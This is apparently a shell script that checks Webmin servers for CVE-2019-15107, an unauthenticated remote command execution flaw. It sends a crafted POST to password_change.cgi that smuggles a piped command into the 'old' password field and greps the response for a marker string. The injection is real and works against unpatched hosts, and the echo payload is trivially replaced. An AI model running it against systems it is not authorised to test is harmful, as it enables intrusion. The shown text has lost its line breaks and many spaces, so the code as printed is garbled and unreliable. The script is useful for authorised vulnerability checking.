#!/bin/sh## CVE-2019-15107 Webmin Unauhenticated Remote Command Execution# based on Metasploit module https://www.exploit-db.com/exploits/47230# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin## Fernando A. Lagos B. (Zerial)# https://blog.zerial.org# https://blog.nivel4.com## The script sends a flag by a echo command then grep it. If match, target is vulnerable.## Usage: sh CVE-2019-15107.sh https://target:port# Example: sh CVE-2019-15107.sh https://localhost:10000# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!#FLAG="f3a0c13c3765137bcde68572707ae5c0"URI=$1;echo-n"Testing for RCE (CVE-2019-15107) on $URI: ";curl-ks$URI'/password_change.cgi'-d'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel'-H'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;'-H"Content-Type: application/x-www-form-urlencoded"-H'Referer: '$URI'/session_login.cgi'|grep$FLAG>/dev/null 2>&1if[$?-eq0];thenecho'\033[0;31mVULNERABLE!\033[0m'elseecho'\033[0;32mOK! (target is not vulnerable)\033[0m'fi#EOF
